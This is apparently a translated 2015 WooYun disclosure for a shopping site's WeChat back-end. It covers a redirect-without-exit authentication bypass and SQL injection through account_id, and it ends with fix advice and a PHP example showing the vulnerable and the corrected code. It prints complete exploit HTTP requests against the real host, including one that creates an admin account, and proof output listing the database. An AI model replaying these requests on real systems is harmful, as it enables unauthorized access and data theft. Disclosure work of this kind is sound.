Vulnerability summary

Defect ID: wooyun-2015-0113875

Title: Unauthorized access to a 优购物 back-end and MySQL injection

Vendor: 北京优购文化发展有限公司

Author: 路人甲

Submitted: 2015-05-13 12:46

Fixed: 2015-06-27 14:36

Disclosed: 2015-06-27 14:36

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-05-13: Details reported to the vendor, awaiting vendor response
2015-05-13: Vendor confirmed; details visible to the vendor only
2015-05-23: Details disclosed to core white hats and domain experts
2015-06-02: Details disclosed to regular white hats
2015-06-12: Details disclosed to intern white hats
2015-06-27: Details disclosed to the public

Summary:

Unauthorized access to a 优购物 back-end and MySQL injection

Details:

Vulnerability 1: 302 bypass
The 302 redirect is issued without calling exit, so the page content is still written into the response body. The back-end can be reached directly by rewriting the returned 302 status to 200 in a proxy.

[Screenshot: 17ugo.1.png]

Example: creating an account named wooyun with password wooyun, after which the back-end is entered without trouble:

POST http://weixin.17ugo.com/index.php/system/account_saveaccount.php HTTP/1.1
Host: weixin.17ugo.com
Proxy-Connection: keep-alive
Content-Length: 129
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://weixin.17ugo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://weixin.17ugo.com/index.php/system/account_newaccount.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: tanchu=1; __ozlvd1687=1431490775; _ga=GA1.2.176173063.1431489248; Hm_lvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431489248; Hm_lpvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431490776; NTKF_T2D_CLIENTID=guestA0E8E9FA-3ADA-86A7-38B7-4B68833B15F2; nTalk_CACHE_DATA={uid:kf_9715_ISME9754_guestA0E8E9FA-3ADA-86,tid:1431489248352962,onlyone:1}; __utma=232567135.176173063.1431489248.1431489249.1431489249.1; __utmb=232567135.2.10.1431489249; __utmc=232567135; __utmz=232567135.1431489249.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nTalk_PAGE_MANAGE={|m|:[],|t|:|12:25:21|}; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2262ec6d7076c52987ddf0fd109027df21%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F42.0.2311.135+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431491396%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225981%22%3B%7D464c98229bae00440f0a77172e4e82e2
account_id=&account_name=wooyun&account_role=1&account_new_passwd_1=wooyun&account_new_passwd_2=wooyun&account_description=wooyun


[Screenshot: 17ugo.2.png]

There are multiple injection points, and the injected parameter is account_id in every case:

POST /index.php/system/account_saveaccount.php HTTP/1.1
Content-Length: 447
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227a321192c2030a4d159f93fe87de5c56%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+8_0+like+Mac+OS+X%29+AppleWebKit%2F600.1.3+%28KHTML%2C+like+Gecko%29+Version%2F8.0+Mobile%2F12A4345%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431453432%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225276%22%3B%7D75360e9880cbd02fb9d5db92f4114d41
Host: weixin.17ugo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
account_description=111111&account_id=*&account_name=test&account_new_passwd_1=test&account_new_passwd_2=test&account_role=-

Proof of vulnerability:

current user:    'wechat@127.0.0.1'
Database: wx2
[278 tables]

Fix:

Call exit immediately after sending the 302 so nothing is written after the redirect.
Filter the parameters (account_id in particular) to eliminate the SQL injection.
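An added example, not the vendor's code, showing both fixes as a minimal PHP handler for account_saveaccount.php beside the vulnerable patterns the report describes: the login guard terminates the script right after the 302, and account_id is validated and bound as a prepared-statement parameter. The table and column names, the $_SESSION['admin'] flag and the database credentials are assumptions.

```php
<?php
// Added example, not the vendor's code. Assumed: table wx_account with columns
// id, name, role, passwd, description; $_SESSION['admin'] is set by the real login.
session_start();
// Bug 1 (302 bypass): the Location header is sent but the script keeps running,
// so the admin page still lands in the 302 body; rewriting the status to 200 shows it.
function require_login_vulnerable(): void
{
    if (empty($_SESSION['admin'])) header('Location: /index.php/login.php', true, 302);  // no exit
}

// Fix 1: terminate right after the redirect so the response body is empty
// no matter what the client does with the status code.
function require_login(): void
{
    if (empty($_SESSION['admin'])) {
        header('Location: /index.php/login.php', true, 302);
        exit;
    }
}

// Bug 2 (injection): account_id is pasted straight into the SQL string.
function save_account_vulnerable(PDO $db, array $p): void
{
    $db->exec("UPDATE wx_account SET name='{$p['account_name']}' WHERE id=" . $p['account_id']);
}

// Fix 2: empty account_id means "create", anything else must be an integer, and
// every value is bound as a parameter so input can never change the query shape.
function save_account(PDO $db, array $p): void
{
    $raw = $p['account_id'] ?? '';
    $id = $raw === '' ? null : filter_var($raw, FILTER_VALIDATE_INT);
    if ($id === false || $p['account_new_passwd_1'] !== $p['account_new_passwd_2']) {
        http_response_code(400);
        exit('bad request');
    }
    $vals = [':name' => $p['account_name'], ':role' => (int) $p['account_role'],
             ':pw' => password_hash($p['account_new_passwd_1'], PASSWORD_DEFAULT),
             ':desc' => $p['account_description']];
    $sql = 'INSERT INTO wx_account (name, role, passwd, description) VALUES (:name, :role, :pw, :desc)';
    if ($id !== null) {
        $sql = 'UPDATE wx_account SET name=:name, role=:role, passwd=:pw, description=:desc WHERE id=:id';
        $vals[':id'] = $id;
    }
    $db->prepare($sql)->execute($vals);
}

require_login();
save_account(new PDO('mysql:host=127.0.0.1;dbname=wx2', 'DB_USER', 'DB_PASSWORD'), $_POST);
```

With the fixed guard, an unauthenticated request to the handler gets a 302 with an empty body, so changing the status code in a proxy yields a blank page instead of the admin form.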

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-05-13 14:35

Vendor reply:

Thank you for your attention; the vulnerability is being fixed.

Latest status:

None